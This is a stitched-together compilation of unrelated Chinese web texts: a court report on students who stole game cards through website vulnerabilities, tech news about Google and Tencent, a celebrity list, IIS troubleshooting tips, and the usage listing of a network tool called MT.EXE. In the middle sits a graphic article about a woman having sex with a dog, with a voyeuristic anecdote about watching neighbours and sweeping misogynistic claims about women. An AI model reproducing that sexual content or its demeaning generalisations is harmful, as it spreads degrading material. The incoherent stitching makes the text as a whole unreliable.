　　就在两地警方立案调查时，成都另一网络公司又发生游戏充值卡失窃案。警方发现，两起盗窃案的盗窃手法如出一辙，其网络用户地址均在西安。去年9月初，西安警方把目标锁定在辖区内某出租房内。警方发现，这个出租房内住有3名男子，他们分别是西安某高校学生张乾、戴觐播，另一男子则是22岁的刘林。警方调查发现，3名可疑人员均是网络高手，一直沉溺于游戏中。警方了解到，自张乾、戴觐播开办网络工作室后，两人从此放弃学业，与刘林一道合伙经营。因长期旷课，张乾、戴觐播被学校开除。

　　去年9月14日，成都警方获得西安灞桥区公安分局提供的办案线索后，遂远赴西安办案，并首先将戴觐播挡获。戴觐播对盗窃事实供认不讳，并带办案民警将张乾抓获。两天后，成都警方又在安徽芜湖市某小区内，将刘林挡获归案。

　　发现漏洞破网站狂卖游戏点卡

　　法院查明，去年6月初，张乾伙同贺某(在逃)进入成都某信息公司网站，发现该网站系统有些漏洞，遂通过这些漏洞，获得该网站数据库的管理权限。然后，张乾使用他在该网站上的注册账号，以虚拟的Q 币，在该网站上大肆收购各种游戏充值卡，然后利用自己的网络工作面，对外贱价出售，两人共计获赃款2000余元。

　　去年7月，张乾又邀刘林、戴觐播加盟，3人决定扩大网络工作室的经营范围。7月27日，张乾等凭借网络专业技术，在该工作室内发现，成都另网络公司的网站存在技术漏洞，便使用“N B S I ”等软件，扩大该网站的漏洞范围，从而获取了该网站数据库的管理权限，并成功盗取了该网站账号及密码。随后，他们利用该公司网络平台，大量收购各类游戏点卡，再以5-6折的价格贱卖，共计获赃款14800元。经失窃公司盘点，造成该公司直接损失为31158元。案发后，三被告的家属已主动退赔了两家公司的失窃损失。

　　一审判决3被告获刑并受罚

　　武侯法院认为，刘林、张乾、戴觐播以非法占有为目的，采取秘密手段在网络上窃取他人财物，数额巨大，其行为均已构成盗窃罪。鉴于戴觐播能带领警方抓获张乾，具有立功表现。本案系一般共同犯罪，应根据三被告在共同犯罪中的地位和作用分别量刑。考虑到三被告归案后均能如实供述犯罪事实，其认罪态度较好，并有悔罪表现，且其家属已代偿了失窃公司的所有损失，并取得了两家公司的谅解，具有酌轻处罚情节。据此，法院以盗窃罪判处张乾有期徒刑3年零6个月；判刘林有期徒刑3年；判戴觐播有期徒刑两年零6个月，并各处罚金2000元

　　5月29日消息，知情人士透露，国内首例网站站长诉谷歌(Google)无效点击的判断和处理方式侵犯其权益案，已于本月24日由上海市第一中级人民法院受理。目前谷歌中国对此事尚无做出回应。
　　黑盒子？
　　 Google Adsense是谷歌在全球的广告联盟产品，网站主可以在其网站上投放Adsense广告，然后从谷歌获得一部分广告收入的分成。
　　提起该诉讼的段先生，是国内一家名为广告发布者(Adsenser)的社区网站站长。据他透露，该网站专门针对Google Adsense的讨论区，集中了一大批将该服务作为赢利手段的网站主。
　　但是，“Google Adsense的无效点击判断和处理方式，已经严重偏离了正常范围，直接影响到了广大发布者的广告收入。”
　　“有发布者账号被停止，理由是无效点击；有发布者收入被调整，理由是无效点击；”段先生认为，谷歌以无效点击作为借口，克扣了很多原本应该分给网站主的收入。
　　从去年中以来，很多中国用户都在反映Adsense广告平均单价越来越低。段先生说，这其中的主要原因就是很多点击被认为是无效点击，收入也相应的被过滤了。
　　之前曾有多位业内人士分析成，网站收入的降低并不是因为广告单价的降低，而是因为有太多的无效点击是没有收入的，从而摊薄了总体的均价。
　　很多网站主反映，对于无效点击的判断就是一个黑盒子，谷歌从来不公开其对无效点击判断的具体技术和标准，也不会去告诉被判断为无效点击的站长具体的原因。
　　陷阱？
　　一位有三次被谷歌以无效点击理由封杀收入帐号的站长，在博客上展示了他与谷歌的有关其帐号交涉的信函。
　　第一次，谷歌称“我们已经注意到您的网页上的广告产生了无效点击。因此，我们停用了您的Google AdSense 帐户。”交涉后，谷歌称旧帐号无法恢复，并发出邀请称，可以申请新帐号加入。
　　第二次，谷歌称，“由于我们发现您的 AdSense 帐户与某个因无效点击行为被停用的帐户有关，我们停用了您的帐户。且不可以再申请AdSense帐户。”交涉后，谷歌并没有给出被停用的帐号开封，而是给出了一个分配过来的新帐号。
　　第三次，谷歌新分配来的帐号，再一次被以与第二次相同的原因封杀。
　　该站长对谷歌模板式的回复不满，希望得到原因的回复。当他再次交涉时，谷歌答复“我们重新确认您网站的广告产生了违反我们的条款和计划政策的无效点击。”并强硬的称，“请记住，我们不会考虑后续或重复申请，也不会就此与您进一步交流。”
　　上述内容是一个非常典型的谷歌对所谓涉及无效点击帐号的处理过程。一位资深的互联网人士认为，对于部分有流量但是并没有太多变现渠道的站长，只能是谷歌挖好的坑中越陷越深，因为强大的谷歌既是运动员也是裁判员，而且他们在协议中称掌握最终解释权。
　　最可怕的是，谷歌对被封杀的所有帐号，是拒付广告费的。有业界人士称，仅通过封杀帐号，谷歌就获得了大量原本应该付给网站主的收入。
　　早先，一般遇到帐号被封杀的站长，都是选择再次注册新的帐号，或者是换用其他同类产品，再有意识的在一些社区中发几个帖子讲述自己的遭遇，而没有人通过法律手段进行维权。
　　诉讼！
　　对于个人而言，诉讼并不是一个解决争议最好的方法。据透露，24日法院的受理案件通知书称，该案将在一个月内开庭审理。
　　除了诉讼之外，站长们与谷歌并不能找到一条合理的沟通渠道，而无效点击的判断和处理方式也不能让站长们信服。起诉谷歌的段先生说，下决心起诉是因为无效点击的受害者非常多，“谷歌得具备起码的合作态度，在公平的立场上和广告发布者协商并解决争议。”
　　“诉讼的流程非常复杂，成本非常高，这也是目前很多发布者有怨言但是没有闹上法庭的原因之一。”段先生说，仅诉讼代理费就7000元，另外还有调查取证和律师费等费用。
　　上万元对于个人站长并不是个小数目，如果与谷歌产生纠纷的费用还没有这么多的话，很可能就放弃索赔，只是通过其它渠道进行发泄。
　　据该案律师透露，在无效点击诉讼之前，首先要解决管辖权的问题。“Google是一个非常聪明的公司，在标准条款里约定了受加利福尼亚州法律管辖，争议应由加利福尼亚州圣克拉拉县境内的法院裁决。”
　　按照我国现行的法律条款，“对格式条款的理解发生争议的，应当按照通常理解予以解释。对格式条款有两种以上解释的，应当作出不利于提供格式条款一方的解释。”段先生说，目前正在等待第一阶段的判断，“也就是要首先判Google adsense管辖权的条款无效”。
　　“在起诉之前曾多次和Google Adsense在美国和中国的服务小组沟通，不过很遗憾看不出他们有任何认真对待这个问题的诚意，”段先生表示，国内因为无效点击被停止账号的，和调整收入的发布者至少有几千人，不排除下一步将发起集体诉讼。
目前谷歌中国尚未对此事作出回应。

　　据国外媒体报道，针对欧盟数据隐私保护组织展开的调查，谷歌(Google)近日做出了回应。
　　欧盟发言人皮特鲁·佩鲁齐(Pietro Petrucci)上周五表示，一个由28人组成的数据隐私保护顾问组织已经展开调查，目标是确定谷歌的搜索引擎是否违反了欧盟隐私保护规定。这家组织主要为欧盟和各成员国政府提供数据保护方面的建议，由于谷歌搜索引擎保留用户搜索数据长达两年之久，引发了该组织的忧虑。佩鲁齐说：“这家组织已经以信函的方式，向谷歌提出了多个问题。”
　　据佩鲁齐称，数据隐私保护顾问组织对谷歌的调查，获得了欧盟司法专员弗朗科·弗拉蒂尼(Franco Frattini)的支持。他说：“弗拉蒂尼认为此次调查适当且合法。”谷歌随后就欧盟的质疑做出回应，称将在6月19日之前正式回答质询。谷歌全球隐私保留法律顾问皮特·弗雷切尔(Peter Fleischer)表示，为了保护用户数据，该公司做了很多工作。他说：“我们一直尊重用户隐私，并努力保障安全，防止欺骗和滥用。我们愿意同任何组织进行建设性的对话。”
　　谷歌一直保留着通过搜索引擎获得的用户信息，例如用户爱好、兴趣和宗教信仰等等，这些信息完全可能被广告客户等第三方所利用。但谷歌表示，绝对不会出卖用户的隐私信息。在欧盟之前，美国一家消费者保护组织已经向美国联邦贸易委员会提交请求，希望就谷歌的阴私保护政策展开调查。
　　弗雷切尔表示：“我们需要保留搜索引擎的日志信息，以保护自身及系统免受攻击，并改进我们的搜索结果质量。”他同时称，谷歌今年3月已将信息保存时间降至18至24个月，而此前为无限期。除此之外，弗雷切尔提到了竞争对手微软与雅虎的信息保存问题。他说：“在主要搜索公司中，我们是唯一一家将隐私保护政策公之于众的公司。为什么欧盟不去调查其它搜索公司呢？”

网络公司开打人才争夺战 最大竞争来自创业公司

　　国外媒体今天发表分析文章称，为了吸引最优秀的人才，很多公司都独辟蹊径，采用了独特的人才招聘方式，其中以谷歌最为明显。

　　人才竞争日趋激烈

　　在一个春季的周六，来自斯坦福大学和加州大学伯克利分校的各90名学生汇聚在谷歌总部，举办为期一天的团队竞赛，比赛项目包括脑筋急转弯、积木搭建问题、以及视频游戏。这一活动被称为谷歌竞赛，对于大多数计算机科学和技术专业的学生来说，它只是两大名校长期对抗的延续。但在娱乐性竞赛的背后，却是严肃的企业招聘行为，以及谷歌同其它公司为争夺人才而展开的激烈竞争。

　　随着更多高科技公司的兴起，技术和其它领域的顶级人才争夺战愈演愈烈。谷歌、微软和雅虎等公司经常会发现，它们在争夺同样的候选人，或者在互相挖角。与此同时，它们还面临着大批创业公司的竞争。在风险投资的支持下，过去几年硅谷又涌现出了大量的创业公司，并蓬勃发展。

　　为了获得最优秀的人才，这些公司已经不再满足于传统的招聘会，而是加入了技术培训、鸡尾酒会、比萨派对、寻宝活动、以及编程大赛等各种全新的招聘方式。与谷歌竞赛类似，这些新颖的方式可以消除应聘者的压力，充分展现公司的吸引力，以及扩大企业的影响力。例如，很多大一新生都因此成为了潜在的应聘者。

　　负责积木搭建比赛的谷歌工程师肯·克里格(Ken Krieger)表示：“通过谷歌竞赛，我们可以让参赛者了解我们的文化，让他们体会到成为谷歌一员的乐趣。”与其它公司相比，谷歌在硅谷人才争夺战中的表现更为抢眼。为了继续保持高速增长，谷歌几乎吸收了所能找到的全部人才。过去几年里，谷歌的员工人数几乎每年就增加一倍，截至今年3月底已经超过1.22万人。目前，谷歌平均每月新增约500名员工。仅在旧金山湾区，谷歌就计划再增加近800个工作职位。

　　谷歌抢占先机

　　既然谷歌如此迫切的需要顶级人才，对于将于2007年毕业的应届大学生来说，获得谷歌的工作邀请并不算太大的惊喜。与此同时，谷歌繁琐、甚至令人厌烦的招聘流程也让很多应聘者对其敬而远之。即便如此，谷歌今年仍被评为年度美国大学生最佳雇主，并首次击败麦肯锡，成为年度美国MBA最佳雇主。在此之前，麦肯锡已经连续保持美国MBA最佳雇主头衔长达12年之久。

　　谷歌今年将再招聘数百名应届毕业生，今年25岁的常雨珊(音译)就是其中之一。她表示：“对于我来说，能在一个环境里学到更多东西最为重要。”常雨珊即将获得斯坦福大学计算机科学和管理硕士学位，目前已经收到多家大公司发来的工作邀请，其中包括微软、谷歌、eBay和甲骨文。她表示，微软表达出了足够的诚意，但她最终还是选择的谷歌。

　　微软最初为常雨珊提供的职位在雷蒙德总部工作，但了解到她不想离开湾区之后，又为她提供了在山景城工作的机会。除此此外，微软多位副总裁都同常雨珊通了电话，其中一位还同她进行了面谈。常雨珊说：“在谷歌，你很少能获得同高层人士面谈的机会。”但是，她最终还是选择了谷歌。

　　由于同谷歌签署了保密协议，常雨珊无法透露加盟谷歌的细节。但是，她之所以选择谷歌，可能同这家公司允许她在加盟后的一年半内每半年更换一次工作职位有关。当然，也可能这家公司的企业文化更适合她。常雨珊表示：“谷歌有很多极具创造力的年轻人，而微软的员工大多在30岁到40岁之间，他们更关注家庭。”

　　过去两年里，谷歌大学招聘计划覆盖的学校已经由70家增至近200家。谷歌如此大规模地招兵买马，让很多小公司吃到了苦头。硅谷创业公司Slide的CEO马克斯·莱文奇(Max Levchin)表示，他以前到母校伊利诺斯大学招聘员工，每次都有不错的结果。但现在一切都发生了变化，很多大学生都将去谷歌工作作为自己的首选。事实上，很多创业公司的CEO都曾体会到类似的挫折感。

　　斯坦福大学并不公布学生毕业后的就业情况，而2007年毕业生的走向更是连非官方数据也没有。但从斯坦福大学就业中心提供的非官方数据来看，过去三年加盟谷歌的斯坦福学生数量要超过其它任何一家公司。尽管员工人数只有微软的六分之一，但谷歌并不惧怕与微软争夺人才，甚至将人才争夺战一直延蔓延微软总部所在地。例如，除加州和纽约之外，谷歌在西雅图地区招聘的工作职位多于美国任何地区。

　　谷歌人才招聘计划的负责人朱蒂·吉尔伯特(Judy Gilbert)表示：“为了从本地获得更多优秀人才，我们采取了大量的措施。”例如，谷歌专门安排中国区总裁李开复授课，目的是吸引西雅图地区庞大的华人群体。李开复曾经在微软任职多年，于2005年加盟谷歌，担任谷歌中国区总裁。微软曾就此提起诉讼，指控李开复和谷歌违反了竞业禁止协议，但最终诉讼双方达成了和解。

　　最大竞争来自创业公司

　　尽管谷歌咄咄逼人，但微软和雅虎表示，它们仍能招聘到需要的人才。微软人才招聘部门总经理斯科特·皮塔斯基(Scott Pitarsky)表示：“我们面临的竞争来自于整个人才招聘市场，而不是某家特定的公司。”与微软类似，雅虎也认为自己的人才招聘计划卓有成效。雅虎也举办了多次编程大赛，希望将此作为吸引人才的全新方式。与此同时，雅虎还专门在加州大学伯克利分校开设了一家研究中心，目的是吸引实习学生。雅虎主管产品战略的副总裁布拉德利·霍罗维茨(Bradley Horowitz)表示：“有很多人从这家实验室加盟了雅虎。”

　　谷歌、微软和雅虎都认为，它们面临的最大竞争来自于创业公司。例如，加州大学计算机专业毕业生尼塔·杰弗(Nitay Joffe)曾在谷歌实习，并已经做好了加盟谷歌的打算。但是，他最终应朋友的推荐加盟了创业公司Powerset。他说：“Powerset和谷歌都拥有我想要的东西，包括优秀的同事，有趣的项目，以及轻松的环境。但不同的是，Powerset还能为我提供一夜暴富的机会。”

　　杰弗同时表示：“在Powerset，我可以获得5美分的股权，而这只股票未来可能会涨至50美元。谷歌的股价已经高达480美元，未来不会再有这样的潜力。难道谷歌的股价会涨到4000美元吗？

自4月19号腾讯QQ创新实验室（labs.qq.com）公布了下一代QQ的概念设计视频后，至今已有20万人次观看过该视频。为此，腾讯内部人士透露，腾讯公司对此成绩相当满意，随后，从QQ社区以及Windows爱好者社区中都陆续传出消息，表示腾讯这次所展示的下一代QQ概念产品，是腾讯与微软中国合作下的结晶。这意味着腾讯在未来产品的开发上，已经跟微软打开了融冰之旅，双方逐渐就自身的强项产品进行了合作的可行性探讨。
　　今年微软Vista操作系统刚正式发布后，腾讯旗下最重要的产品QQ与Vista不兼容的情况就浮上台面。尽管从Vista的Beta测试版开始，腾讯QQ就一直难以在Vista上登陆运行，但是直到Vista正式版发布后，双方依然没有就这个问题立刻发布可以完美解决的补丁或解决方案。为了解决部分喜欢尝鲜的用户在Vista下正常登陆使用QQ，腾讯随后发布了临时解决方案，指示用户可通过删除与软键盘使用有关的QQ程序文件来在Vista上登陆。业界人士普遍认为此举属权宜之计。即使腾讯随后发布的QQ 2007 Beta1版顺利兼容Vista。但互联网业界不少资深人士仍然对腾讯和微软之间的进一步合作不抱有更多希望。
　　然而，消息人士透露，作为腾讯公司目前最为看重的创新中心，却率先与微软中国展开合作，在Vista上研发出下一代视频观看方式QQ Video Gadget，这显示出腾讯在博弈布局上颇费思量。首先，由于创新意识并不受公司意识形态的过多影响，因此腾讯以创新中心与微软中国方面展开合作接头，并不会受到过多的外界质疑与干预。第二，由于目前双方合作主要围绕QQ Video Gadget这一QQ衍生产品而展开，因此也不会让外界认为双方在即时通讯互联互通方面有更进一步的合作，从而对公司的基本面预测产生变数。事实上，尽管微软中国跟微软MSN的功能职责都有所区分，但是外界依然容易将微软中国所负责的技术支持与MSN的互联互通混为一谈。因此通过创新中心与微软中国方面进行交流，可以将公众注意力依然聚焦到创新技术上来，而避免产生其他风传。
　　根据消息，下一代的QQ面板将完全突破现有的QQ模式，采用立体3D模式，金属色造型，天蓝色面板，明黄色外框等元素作为主题识别特征，而聊天对话框采用半透明方式。这主要是配合了支持DX10的显卡核心，支持Vista中的Aero显示效果（俗称毛玻璃效果）。
　　除此之外，由于微软已经将原有的Windows Tablet PC版本作为Vista中的一项功能加入其中，因此腾讯特意在下一代QQ的概念设计中加入了支持触摸屏的功能，用户可以用手在屏幕上拖拽和翻转，用触摸方式实现与好友对话，收发邮件等操作。
　　“届时QQ宠物的养育方式会跟现在有很大的差异，而QQ宠物也因此有望得到更多用户的喜爱和认同。”消息人士透露。据了解，在应用触摸屏技术后，新概念的QQ融合了QQ宠物的一些新设计思路，比如用户可以用对QQ宠物的方式对待新一代的QQ，当用户心情好的时候，可以用手轻抚触摸屏上的宠物逗它玩，而当用户心情不好的时候，可以拍打触摸屏上的宠物来出气。
　　消息人士透露，自Vista系统开发以来，双方接触非常频繁。QQ Video Gadget第一次露面是在微软中国的vista发布大会上，当时就获得了很多好评。如今，双方在创新技术、接口兼容等各方面都保持接触。腾讯方面希望借力微软的Vista系统，将自由的创新技术进行整合，成为用户在一个平台上就能进行一站式全方位体验的新型社区工具，而微软中国方面则强烈希望能够尽快在中国市场上推广普及Vista系统。因此双方在技术和市场方面都存在一致利益，以致双方合作在近期内一直畅通无阻。
　　根据业内人士消息，QQ Video Gadget并非腾讯和微软仅有的合作沟通。腾讯方面内部已经表示，以后将会和微软中国还有类似的合作探索

　　郑智化
把他排在第一的原因很简单，熟悉他的人都知道他所唱的是什么歌。作为一个歌手，身处台湾，他敢出来公然反对台独，唱一些励志歌《大国民》《蜗牛的家》《面子问题》＝＝都是绝世经典之作，也许他的歌不是最好的，但他的爱国情结绝对是当代娱乐圈独有的。



　　成龙
大家都知道大哥的爱国情结，无论走到哪他都穿唐装，他都会宣传中国文化。更多的时候他在告诉世界上的人：我是中国人！



李小龙
李小龙的事迹就不用多说了吧，谁都知道他所经历的和他为我们中国在世界的地位带来的贡献。



黄子华
也许大家对他很陌生，但看过23届香港电影金像奖的朋友都知道他当时所了一句什么话吧？“回去之后别忘了告诉日本人，钓鱼岛是中国的。”在这样一个场合说出这样的话，恐怕不是仅仅靠勇气的，就凭这句话就应该把他排第一了，无奈前面3个太优秀了。



　屠洪刚
谁都知道他凭一个《精忠报国》打动了多少炎黄子孙。《中国功夫》更带来无限的激情。相信没用深深的爱国之心绝不能唱出这种气魄。



李连杰
谁都知道中国能真打的除了李小龙和成龙就是李连杰了。没有人会质疑他的武术造诣。同样也没人能否认他对宣扬中国文化的作用和贡献，单是他在外面自豪地说我是中国人就已经有足够理由让他上榜了。



周星驰
也许大家很奇怪为什么这个无厘头也能上榜，但星爷的确有颗炙热的爱国心。大家可以回想一下他的影片，80%里面带着对日本人的鄙夷和羞辱。由此可知道他心中的确有一份中国情结。而且他经常出外也穿着唐装。本来他可以排前点的，但他始终没有在公开场合宣布他那份爱国心，所以只能让他屈尊最后了。



刘德华
“让世界知道我们都是中国人……”



　　罗大佑：
为反对美国要求台湾出兵伊拉克，罗大佑在自己的演唱会上当场撕毁了自己的美国护照

首先声明;此文来源于网络,之所以要转,在觉得有意思时,认为作者也有才!不喜欢的话,就不要看了吧!
浙江嘉兴王江泾某离婚女子在家与狗性 交时发生卡住的事，狗狗的生殖器在她的阴 道里拔出不来，该女子使尽了浑身解数，仍然无法分开，历经两天后，不得不拨打120求救，最后在嘉兴医生的帮助下才得以解困。

关于女人与动物造 爱的事，并非稀奇。中国古代的文字中早有记载，如清褚人获《坚瓠续集》引《文海披沙》说：“磐瓠之妻与狗 交。汉广川王裸宫人与羝 交。灵帝于西园弄狗以配人。真宁一妇与羊 交。沛县磨妇与驴 交。杜修妻薛氏与犬 交。宋文帝时，吴兴孟慧度婢与狗 交。章安史悝女与鹅 交。突厥先人与狼 交。卫罗国女配英与凤交。陕石贩妇与马 交。宋王氏妇与猴 交。”还说：“临安有妇与狗 奸。京师有妇与驴 淫。荆楚妇人与狐 交……天下之大，何所不有?”在古埃及则有崇拜“金牛”（斑纹的黑牡牛）之风，那时的少女们纷纷把下体献给“金牛”，这是她们的一种宗教责任。而在欧洲的黄 色碟片里，这种人和动物交 配的场面也比比皆是。记得第一次看到这些时，惊恐万状，但现在我知道，对欧洲人来说，这是一种古老的习俗。 可是这则新闻奇就奇在该女子与狗造 爱时竟然卡住了，而且一卡就是两天。狗与狗交 配卡住是很正常的事，这是由狗那话儿的特殊构造（有阴 茎骨）决定的。记得小时候，经常会在街头看到肆无忌惮交 配的狗，于是就会与小伙伴用砖头砸粘在一起的两只狗。可是，越要赶开他们，他们却越链在一起，而且还不停地嗷嗷叫。人与人造 爱被卡住的事，似乎很少听到，不过也不能排除。记得小学同桌女生的父母就有过一次卡住事件，最后两人被裹着抬往了医院。为此，我们常以此来笑话那个女生。


女人与狗造 爱被卡之事还真是第一次听到。我还特地在网上查了一下，从理论上来说，如果女人真与狗造 爱，那么被卡住是很正常的事。狗造 爱的频率远远高于人，强度来的大，很容易使女人获得生理上的满足与高潮。而高潮一旦来临，那么身体必然有极大反应，这种反应会使阴 道急剧收缩。在收缩之下，狗的那话儿受强烈刺激后，位于前端的龟 头球状海绵体立即充血并迅速膨胀，周径比原来增大1倍左右，于是被卡住、锁紧，以致无法脱出。但是一般只要射 精后，就能拿出来，最多被卡一两个小时，没有听说有两天的。不过，也很难说，既然这个世界有女人与狗造 爱，那么为何就不能有被卡住两天的事呢？

这件事，我在惊奇、好笑的同时，更有了思考，因而也写了这篇或许要被人痛骂的文章。但事实，当听到这则真实发生在周围的奇闻时，我突然有了许多疑问。为什么越来越多的女人开始养狗，从迷你型的宠物狗，到很大的狼狗？为什么有些看似高贵、优雅也很富有的女人时常会抱着一条名贵的狗，有时还要与狗亲吻，再暧 昧地喊上一声宝贝甚至老公？我还想，在这个不缺少机会的时代，女人们干吗不找男人，却愿意与狗性 交？难以置信，可是事实上这类事的确发生着，记得前些曰子也曾听到过某女子与狗亲 热时，被兽性发作的它撕咬了私处，最后送进医院，差点赔了性命。我还想起了前不久沸沸扬扬的《湖南著名记者被“兽 奸”富婆包养成性奴，怒告变态富婆索赔千万》的新闻中富婆刘嫱，据名记李江云说，她高雅，有修养，风姿绰约，可是竟然跟她的德国名犬“多多”做 爱。可以想象，在阴暗的私人世界里，有许多养着宠物狗的女人们与这些畜生发生着许多不为人知丑陋的故事。

当女人与狗造 爱时，我更多地为人类感到悲哀，也为女人悲哀，更为我们男人悲哀。有时我们男人真的连一条狗都不如。当我们在为搞不到那些漂亮、高贵而有钱的女人而痛骂她们“狗曰的”之时，却发觉原来许多这些女人真的正在被狗曰着。那么，是什么让女人们愿意被狗曰呢？我想总有N个理由吧。

或许是孤独，需要精神的安慰。人与人之间其实并不密切，在这个世界里，许多人孤独地存在着，虽然置身于热闹的场所，但灵魂无法交流。时常在半夜之时看到丈夫拖着疲惫的身子回来，然后躺在身边，但从来不曾有过心与心的交流。除了给你足够的钱，让你过上舒服的物质生活之外，每天不到十来句简单的对话，还有什么呢？身边有许多男女与你热闹交往着，但依然找不到真正的知己。在花天酒地、纵情欢愉之后，心依然在流浪。这时，那条忠实的狗却在家等你，会不舍不弃在你的身边，永远用它温顺而专情的眼神看你，听你的诉说。即便你心情不好时给它来上几脚，它仍会温顺地匍匐于你脚下。在这种孤独中，你与狗狗成了好朋友，把心中最秘密的事告诉它。而它会一边听一边轻轻的汪汪上几声然后轻挠你饥饿的皮肤，让你感受到异常的暖意，从而多了一份精神的安慰。这时，狗狗便是你最知心的朋友。

或许是失望，需要肉 体的满足。在这个世界上，男人对于女人而言真的太让人失望了。这种失望不但体现在情感的不专一，更体现在性的无能上。许多男人，一生就做两件事，不断地弄钱，不断地弄女人。当他们在外面弄一个个女人时，必然要冷落家里的女人。所以，我们经常会看到清闲而富有的女人时常会牵着名贵狗狗，而看不到她们牵着大肚皮的胖老公。你或许要说，牵不住老公的手，也不必牵狗狗啊，难道世上就没有其他男人让你牵了。这倒不是，男人很多，可又有几个是值得你真心而且长久地牵着的呢？而且那又是别人家的男人，哪能似狗那样牵得自由，牵得大方，牵得招摇过市？再说男人与你牵，你只不过是一个目标而已，当他们得到之后，你依然被抛弃。只有家里的那条狗狗才是最忠诚，最专情。情感不专一也就算了，可许多男人又性无能。男人二十岁左右性 能力最强，三十之后明显下降。相反女人则是三十如虎，四十如狼。可想而知，当男人步入三十、四十后，怎能满足家里的女人呢？这让我想起杨君说的故事。杨君家住四楼，而他家后那幢楼的底楼一户人家中住着一对四十岁左右的夫妇，丈夫一般每天很晚回家。那家还有一个不好的习惯，就是不大注意把窗帘拉严。因此，杨君时常在不经意间看到女主人浴室洗澡，甚至自 慰的情景。他还看到他们在床上做 爱的情景。有一次，男的很晚到家，洗完躺在床上，而女的也许好久没做 爱了，所以很卖力地在丈夫身上忙碌，可手忙不管，只好用嘴才帮助丈夫硬起来，可不到一分钟，就丈夫不行了。你说，这妻子怎么满意呢？现在部分有钱的中年男人出去弄女人，其实并不是弄 女人，相反是让女人弄。他们唯一做的就是舒服舒服地躺着，让那些比自家女儿还要小的女孩儿们用各种方式在身体上忙活。这就是许多所谓成功男士的生活。你想想，这种男人不带绿帽子才怪，有时不但要带人的绿帽子，还要带狗的绿帽子。你不回家，那么也许狗狗会钻进女人的被窝占据你的坑，让她获得肉 欲的满足。狗狗在女人眼中既可以是小孩，也可以是朋友，更可以是情人、性 伙伴。它忠实、听话，所有一切在男人身上无法得到的享受，在狗狗的身上却能得到。也许女人在有钱男人面前是一条狗，但在狗的面前却绝对是有尊严的主人。这难怪女人们。

本来已经安装好了的IIS今天早上发现IIS网站已经停止，重新启动却提示服务器没有及时响应启动或控制请求！无奈之下重装IIS，没想到问题依然没有解决。我的系统环境是：Windowsxp sp2, IIS5.1 难道这些解决方案对我失效,我查看了一下计算机的服务项里,发现"World Wide Web Publishing"关闭了，启动也提示启动失败。看来是里程无法启动,这时候当然看看防火墙或是杀毒软件有没有相关的进程,"World Wide Web Publishing"的可执行文件是"inetinfo.exe"(inetinfo.exe主要用于支持微软Windows IIS网络服务的除错。这个程序对你系统的正常运行是非常重要的。),在瑞星防火墙访问规则里找到"inetinfo.exe"访问规则设为全部放行. 再次启动"World Wide Web Publishing",然后再启动IIS,一切OK. 我顺便在网上查找了一下其他的IIS不能启动的原因及方法，如下：

1.系统环境：Windowsxp+sp2,II5.0，故障现象：上午把IIS服务停止以后，程序长时间没响应，通过任务管理器关闭，启动时提示“服务没有及时响应启动或控制请求”，重启计算机未能解决。
解决办法：在Internet信息服务下有本地计算机(计算机机名)，单击名键，选择断开，提示确实要断开本地计算机(计算机机名)吗？选择确定。
右键单击Internet，选择连接，计算机名填本机名称，用户名填本机管理员帐号（Administrator），确定。

2.　　昨天就发现了公司我用这台电脑的IIS启动不了，今天早上试着解决它，才发现问题并不简单。找呀找呀找呀，发现"WorldWideWebPublishing"关闭了，启动也提示启动失败。静下心来，再看看其它关闭了的服务，有一项Eventlog把它启动了，再启动WorldWideWebPublishing成功。问题就在这里。

3.　　IIS元数据库可能坏了。。测试一下。Try to enumerate metabase: 1. Open a command prompt and change to the C:\Inetpub\Adminscripts folder. 2. At the command line, type "cscript adsutil.vbs enum " (without the quotation marks). If this command is successful, it enumerates the settings in the metabase. If the command is not successful, you receive the -2146893792 (0x80090020) error code. 假如有备份，把数据回复。如果没有，参考 How to Manually Restore the Metabase When No Proper Backup Exists or When the MMC Does Not Start http://support.microsoft.com/?id=234429 HOW TO: Download, Install, and Remove the IIS MetaEdit 2.2 Utility http://support.microsoft.com/?id=232068 [/code] [code]4.　

　解决IIS不能启动，提示服务器没有及时响应启动或控制请求！问题现象：
1、在IIS中站点显示停止，点击开启IIS不能启动，提示：服务器没有及时响应启动或控制请求点击重新启动IIS提示：服务器没有及时响应启动或控制请求！
2、World Wide Web Publishing Services不能启动，提示“错误1721，资源不足，无法启动”
解决方法：
1、刚刚我也出现了那个问题，弄了一上午现在解决了，我是查出了World Wide Web Publishing Service服务没有启动，也启动不了，按照他的依存关系，把其他的服务启动了就可以了，我启动的是HTTP SSL，然后World Wide Web Publishing Service就可以用了，iis也可以了
2、有一次站点访问失败，IIS服务无法启动，我的解决思路是这样的：关闭瑞星杀毒软件，先打开Administrative Tools --> Service，发现World Wide Web Publishing Service停止了。于是试图启动该服务，结果报错。于是查看World Wide Web Publishing Services所需要依赖的服务（Dependencies），看到是IIS Admin Service。进而发现IIS Admin Service也无法启动，再查IIS Admin Service的Dependencies，查的结果是Protected Storage和RPC（Remote Procedure Call），于是启动RPC，接着顺利启动IIS Admin Service，接着启动World Wide Web Publishing Services，于是IIS恢复正常。

C:\>cscript aa.vbs
Microsoft (R) Windows Script Host Version 5.6
版权所有(C) Microsoft Corporation 1996-2001。保留所有权利。
CScript 错误: 无法找到脚本“C:\aa.vbs”的脚本引擎“VBScript”
单独运行cscript如下：
C:\>cscript
Microsoft (R) Windows Script Host Version 5.6
版权所有(C) Microsoft Corporation 1996-2001。保留所有权利。
用法：CScript scriptname.extension [option...] [arguments...]
选项：
//B       批模式：不显示脚本错误及提示信息
//D       启用 Active Debugging
//E:engine   使用执行脚本的引擎
//H:CScript 将默认的脚本宿主改为 CScript.exe
//H:WScript 将默认的脚本宿主改为 WScript.exe （默认）
//I       交互模式（默认，与 //B 相对)
//Job:xxxx   执行一个 WSF 工作
//Logo     显示徽标（默认）
//Nologo   不显示徽标：执行时不显示标志
//S       为该用户保存当前命令行选项
//T:nn     超时设定秒：允许脚本运行的最长时间
//X       在调试器中执行脚本
//U       用 Unicode 表示来自控制台的重定向 I/O

如此能解决 嘿嘿

MT.EXE是一个网络管理方面的软件,依照yy3的说法,也就是 "七拼八凑来的，纯粹是图个方便。"可是这个方便个真的是太方便了,有了这40K的一个程序,可以删除我们电脑里面多达几M的程序,让我们先来看看这个程序的真面目吧:
D:\>mt.exe

Usage: mt.exe <Opintion>
Opintion :
-filter ---Change TCP/IP filter to on/off status.
-addport ---Add ports to the filter' allowed portlist.
-setport ---Set ports as the filter' allowed portlist.
-nicinfo ---List TCP/IP interface info.
-pslist ---List active processes.
-pskill ---Kill a specified process.
-dlllist ---List dlls of a specified process.
-sysinfo ---List system info.
-shutdown ---Shutdown system.
-reboot ---Reboot system.
